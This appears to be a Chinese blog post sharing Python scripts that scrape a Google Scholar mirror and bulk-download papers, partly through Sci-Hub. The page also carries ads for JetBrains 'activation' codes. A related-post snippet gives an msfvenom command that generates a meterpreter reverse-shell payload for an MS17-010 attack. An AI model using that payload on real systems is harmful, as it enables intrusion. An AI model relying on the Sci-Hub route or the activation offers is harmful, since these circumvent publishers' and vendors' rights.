谷歌学术搜索文献_谷歌学术论文翻译

谷歌学术搜索文献_谷歌学术论文翻译谷歌学术文献信息爬取及文献下载

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

两个py文件

起主要作用的Search&Download.py

# -*- coding: utf-8 -*-

import requests
from bs4 import BeautifulSoup
from Download import Hubber
import xlwt,os
from time import sleep
from tqdm import tqdm


TotalNum=0
class Article(object):
    title = ""
    article_link = ""
    authors = ""
    authors_link = ""
    abstract = ""
    def __init__(self):
        title = "New Paper"

def save_xls(sheet, paper):
    # 将数据按列存储入excel表格中
    global TotalNum
    sheet.write(TotalNum, 0, TotalNum)
    sheet.write(TotalNum, 1, paper.title)
    sheet.write(TotalNum, 2, paper.article_link)
    sheet.write(TotalNum, 3, paper.journal)
    sheet.write(TotalNum, 4, paper.authors_link)
    sheet.write(TotalNum, 5, paper.abstract)
    TotalNum += 1

head = { \
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36' \
        }  # 20210607更新,防止HTTP403错误
article_titles = []
article_links = []

def GetInfo(sheet,url):
  r = requests.get(url, headers=head)
  r.raise_for_status()
  r.encoding = r.apparent_encoding
  soup = BeautifulSoup(r.text, "html.parser")
  #print("\n"+soup)
  articles = soup.find_all(class_="gs_ri")
  for article in articles:
      paper =Article()
      try:
          title = article.find('h3')
          paper.title = title.text
          #print("\n"+paper.title)
          article_titles.append(paper.title)
          paper.article_link = title.a.get('href')
          #print("\n"+paper.article_link)
          article_links.append(paper.article_link)

          journal = article.find(class_="gs_a")
          paper.journal =journal.text
          #print("\n"+paper.authors)
          authors_addrs = journal.find_all('a')
          for authors_addr in authors_addrs:
              #print("\n"+authors_addr.get('href'))
              paper.authors_link=paper.authors_link +(authors_addr.get('href'))+"\n"

          abstract = article.find(class_="gs_rs")
          paper.abstract = abstract.text
          #print("\n"+paper.abstract)
      except:
          continue
      save_xls(sheet,paper)
  return


def getArticle(article_titles,article_links):
    dir = ".\\Articles\\" +keyword +"\\"
    #print (dir)
    if os.path.exists(dir) == False:
        os.mkdir(dir)
    for k in tqdm(range(len(article_titles))):
        article_titles[k]="{0}".format(article_titles[k].replace(':', ' ')).replace('.', '')
        path = dir + article_titles[k] + ".pdf"
        #print("\n"+path)
        try:
            Hubber.getPDF(article_links[k],path)
            sleep(0.5)
        except:
            continue

if __name__ == '__main__':
    myxls = xlwt.Workbook()
    sheet1 = myxls.add_sheet(u'PaperInfo', True)
    column = ['序号', '文章题目','文章链接','期刊', '作者链接', '摘要']
    for i in range(0, len(column)):
        sheet1.write(TotalNum, i, column[i])
    TotalNum+=1

    keyword=input("keywords is?\n")
    #keyword = diabetes and conjunctiva and (microcirculation or microvasculature)
    #print("\n"+keyword)
    key = keyword.replace(" ","+")
    info = keyword + "_PaperInfo.xls"

    print("\n"+"检索中……")
    if os.path.exists(info) == True:
        print("\n" + "PaperInfo already exists!")
    else:
        start = 0
        for i in tqdm(range(10)):
            url = 'https://xs.dailyheadlines.cc/scholar?start=' + str(start) + '&q=' + key + '&hl=zh-CN&as_sdt=0,5'
            start = start + 10
            GetInfo(sheet1,url)
            myxls.save(keyword+'_PaperInfo.xls')
            sleep(0.5)
    print("\n"+"检索完成")

    print("\n"+"下载中……")
    if len(article_titles) != 0:
        getArticle(article_titles, article_links)
    else:
        import xlrd
        data = xlrd.open_workbook(info)
        table = data.sheet_by_index(0)
        article_titles = table.col_values(1)[1:]
        article_links = table.col_values(2)[1:]
        #print("\n"+article_titles)
        #print("\n"+article_links)
        getArticle(article_titles, article_links)
    print("\n"+ "下载完成")

起辅助作用的Download.py,可将更多网站补充进去! 

import os.path
import re
import requests
from bs4 import BeautifulSoup

class Hubber:
    head = { \
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36' \
        }  # 20210607更新,防止HTTP403错误

    def pdf_hub(url,path):
        try:
            pdf = requests.get(url, headers=Hubber.head)
            with open(path, "wb") as f:
                f.write(pdf.content)
            print("\n"+"pdf found directly!")
        except:
            print("\n"+"failed to download pdf directly!\n" +url)
            Hubber.err_log(url)
    def sci_hub(path,doi):
        doi = str(doi).split("https://doi.org/")[1]
        url = "https://www.sci-hub.ren/doi:" + doi + "#"
        r = requests.get(url, headers=Hubber.head)
        r.raise_for_status()
        r.encoding = r.apparent_encoding
        soup = BeautifulSoup(r.text, "html.parser")
        download_url = soup.iframe.attrs["src"]
        try:
            download_r = requests.get(download_url, headers=Hubber.head)
            download_r.raise_for_status()
            with open(path, "wb+") as temp:
                temp.write(download_r.content)
                print("\n"+"Article downloaded by doi!")
        except:
            print("\n"+"failed to download pdf by doi!\n" +url)
            Hubber.err_log(url)

    def err_log(url):
        with open("download_err.txt", "a+", encoding="utf-8") as error:
            error.write("PDF not found,download link may be: \n"+url +"\n")

    def getSoup(url):
        r = requests.get(url, headers=Hubber.head)
        r.raise_for_status()
        r.encoding = r.apparent_encoding
        soup = BeautifulSoup(r.text, "html.parser")
        return soup

    def getPDF(url,path):
        if os.path.exists(path) == True:
            print("\n" + "Article already exists")
        else:
            if (len(re.findall('pdf', url)) != 0):
                print ("\n"+'pdf link already!')
                Hubber.pdf_hub(url,path)
            elif re.match("https://www.sci-hub.ren/",url):
                print("\n" + 'sci_hub link!')
                url = str(url).replace("https://www.sci-hub.ren/","https://doi.org/")
                Hubber.sci_hub(path,url)
            #if pdf can be easily found!
            elif re.match("https://academic.oup.com/", url):
                soup = Hubber.getSoup(url)
                pdf_link ="https://academic.oup.com"+soup.find(class_="al-link pdf article-pdfLink").get('href')
                #print("\n"+pdf_link)
                Hubber.pdf_hub(pdf_link,path)
                '''
                doi = soup.select('div[class="ww-citation-primary"]')[0].a.get('href')
                #print("\n"+doi)
                Hubber.sci_hub(path,doi)
                '''
            elif re.match("https://content.iospress.com/", url):
                soup = Hubber.getSoup(url)
                pdf_link = soup.find(class_="btn btn-download btn-right get-pdf").get('href')
                # print("\n"+pdf_link)
                Hubber.pdf_hub(pdf_link, path)
            elif re.match("https://wwwnature.53yu.com/", url):
                soup = Hubber.getSoup(url)
                pdf_link = soup.find(class_="c-pdf-download__link").get('href')
                #print("\n"+pdf_link)
                Hubber.pdf_hub(pdf_link, path)
            elif re.match("https://bjo.bmj.com/", url):
                soup = Hubber.getSoup(url)
                pdf_link = soup.find(class_="article-pdf-download").get('href')
                pdf_link = "https://bjo.bmj.com" + pdf_link
                #print("\n"+pdf_link)
                Hubber.pdf_hub(pdf_link,path)
            elif re.match("https://jamanetwork.com/", url):
                soup = Hubber.getSoup(url)
                pdf_link = soup.find(class_="toolbar-tool toolbar-pdf al-link pdfaccess").get('data-article-url')
                pdf_link = "https://jamanetwork.com" + pdf_link
                #print("\n"+pdf_link)
                Hubber.pdf_hub(pdf_link, path)

            #if pdf can't be easily found,but doi can!
            elif re.match("https://sciencedirect.53yu.com/", url):
                soup = Hubber.getSoup(url)
                doi = soup.find(class_="doi").get('href')
                Hubber.sci_hub(path, doi)
            elif re.match("https://diabetes.diabetesjournals.org/", url):
                soup = Hubber.getSoup(url)
                doi = soup.select('.citation-doi')[0].a.get('href')
                Hubber.sci_hub(path, doi)
            elif re.match("https://journals.lww.com/", url):
                soup = Hubber.getSoup(url)
                doi = "https://doi.org/" + str(soup.find(id="ej-journal-doi").text).split("doi: ")[1]
                Hubber.sci_hub(path, doi)
            else:
                '''
                https://europepmc.org/
                https://iovs.arvojournals.org/
                https://linkspringer.53yu.com/
                '''
                print("\n"+"To be prettified!Download link may be: " +"\n" +url)
                Hubber.err_log(url)

if __name__ == '__main__' :
    url = "https://www.nature.com/articles/s41598-021-87315-7.pdf"
    url1 = "https://www.sci-hub.ren/doi:10.1067/mva.2003.139#"
    url2 = "https://www.sci-hub.ren/doi:10.1067/mva.2003.139#"
    Hubber.getPDF(url,"test.pdf")
    Hubber.getPDF(url1,"test1.pdf")
    Hubber.getPDF(url2,"test2.pdf")

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/183156.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • 5-去掉a标签下划线,禁止a标签的跳转「建议收藏」

    5-去掉a标签下划线,禁止a标签的跳转「建议收藏」1.去下划线:  写样式,a{text-decoration:none;  或在a标签内联里面写style=”text-decoration:none;”;2.禁用a标签跳转:a标签href不跳转禁止跳转当页面中a标签不需要任何跳转时,从原理上来讲,可分如下两种方法:标签属性href,使其指向空或不返回任何内容。如:<ahref=”java…

  • zabbix监控jmx

    zabbix监控jmx背景:目前公司用的主要语言就是java,然后在运维过程中会遇到频繁的内存溢出的情况,之前使用过elk日志分析系统可以实时的判断出内存溢出的情况,但是无法查看内存的使用情况,只能通过dump文件查看内存溢出的时候dump下来的文件去分析。这样也无法准确的判断出问题。zabbix可以监控java,并且将内存的使用情况实时的展现出来,这是一个不错的选择。JMX的全称是JavaManagement…

  • npm卸载模块(nodejs原生模块npm)

    npmuninstall模块 删除本地模块时你应该思考的问题:是否将在package.json上的相应依赖信息也消除?npmuninstall模块:删除模块,但不删除模块留在package.json中的对应信息npmuninstall模块–save 删除模块,同时删除模块留在package.json中dependencies下的对应信息npm

  • JAVA基础知识之BufferedWriter流

    JAVA基础知识之BufferedWriter流一、BufferedWriter流    API文档说明:  1)将文本写入字符输出流,缓冲字符,以便有效地写入单个字符,数组和字符串?   说明存在用单个字符、数组、字符串作为参数的方法写入数据    2)可以指定缓冲区大小,或者可以接受默认大小。对于大多数用途,默认值足够大?   说明该类存在一个常量值用作默认缓冲区大小同时也可以通过构造函数指定大小    3)…

  • Jediscluster_唧唧pc客户端

    Jediscluster_唧唧pc客户端前言:由于spring-data-redis不支持,redis集群的操作。所以更换客户端,使用Jediscluster。正文:一.序言   前面搭建了个3个msater-slave的本地集群测试,这里用java的客户端进行一些简单测试,看看集群是否生效。   redisclient推荐:http://redis.io/clients 

    2022年10月14日
  • MS17010原生打法

    MS17010原生打法1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。项目地址:https://github.com/TolgaSEZER/EternalPulsemsfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.3.128LPORT=4443-fdll>x

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号